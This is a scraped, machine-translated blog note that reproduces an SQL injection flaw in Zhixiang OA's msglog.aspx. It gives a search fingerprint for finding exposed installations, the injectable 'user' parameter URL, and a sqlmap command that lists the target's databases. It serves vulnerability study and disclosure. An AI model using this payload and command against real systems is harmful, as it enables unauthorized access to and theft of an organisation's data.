当前位置:网站首页>OA vulnerability recovery manual
OA vulnerability recovery manual
2022-04-21 07:32:00 【1stPeak】
Preface : Zhi Xiang OA Product vulnerability recurrence notes , For your own use , Irregular update
Statement : All my articles are technical sharing , Do not use it illegally for other purposes , Otherwise, we will be responsible for the consequences .
Vulnerability list :
Zhi Xiang OA msglog.aspx SQL Inject holes
Zhi Xiang OA msglog.aspx SQL Inject holes
Vulnerability description
Zhi Xiang OA msglog.aspx File exists SQL Inject holes , An attacker can obtain sensitive information through a vulnerability
Holes affect
Zhi Xiang OA
Network mapping
app=" Zhixiang Software - Zhi Xiang OA"
Loophole recurrence
The parameters of existence injection are user
poyload:
/mainpage/msglog.aspx?user=1
py -3 sqlmap.py -u "http://xx.xx.xx/mainpage/msglog.aspx?user=1" -p user --dbs --random-agent

版权声明
本文为[1stPeak]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204210623241504.html
边栏推荐
- Mask + RGB for background subtraction
- 浅学cookie注入
- jfinal框架easyexcel插件导出带图片
- WordPress plugin - easy WP SMTP
- Unity Button长按检测
- 【手部姿态估计】【论文精读】3D Hand Shape and Pose Estimation from a Single RGB Image
- Udevd retrieves the kernel module and loads the demo
- View source parsing
- IDEA配置servlet出现404问题解决
- You get command and stepping on the pit
猜你喜欢

从零开始搭建一台深度学习服务器及环境配置
![[intensive reading] deep surface normal estimation with hierarchical rgb-d fusion](/img/50/ccc038ac068ae7c51ae53c2dcf3df9.png)
[intensive reading] deep surface normal estimation with hierarchical rgb-d fusion

华天OA漏洞复现手册

Porting ucosiii to ucosiii - task suspend / restore / hook / (nanny tutorial)

DIP-图像平滑化处理

Installing deepstream on TX2

hutool工具 导出excel 自定义样式------excel压缩jar

《21天實戰caffe》1-7天學習筆記一

One day study notes

UCOSIII移植到UCOSII—任务挂起/恢复/钩子/(保姆级教程)
随机推荐
盲猜账号密码
mmdetection 使用自定义数据集训练 将数据集转为COCO格式
图形学基础|深度缓冲(DepthBuffer)
Idea 2021.1 Useful settings
Unreal Engine notes summary (continuously updated...)
TX2上硬件编解码加速CSI接口摄像头
教务管理信息系统 一键评价课程脚本
Weak password-20211221
Udevd retrieves the kernel module and loads the demo
Yolo pedestrian detection and counting (yolov3 + deepsort) using Google Lab
Common MySQL statements
word xml 空格符
Study the process of automatically loading kernel modules from SYSTEMd udevd running log
【手部姿态估计】开源数据集-合集-RGBD-IR-Depth
Installation of performance testing tool JMeter & JProfiler
Blood cases caused by dpdk program startup sequence
Ms12 020 vulnérabilité
迷你考试系统v1.0.0版本
华天OA漏洞复现手册
IDEA配置servlet出现404问题解决